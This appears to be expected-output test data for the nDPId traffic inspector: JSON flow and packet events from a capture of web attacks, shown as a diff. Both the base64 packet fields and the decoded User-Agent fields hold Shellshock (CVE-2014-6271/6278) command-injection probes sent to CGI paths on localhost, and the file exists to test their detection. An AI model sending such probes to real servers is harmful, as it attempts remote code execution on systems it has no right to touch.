00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 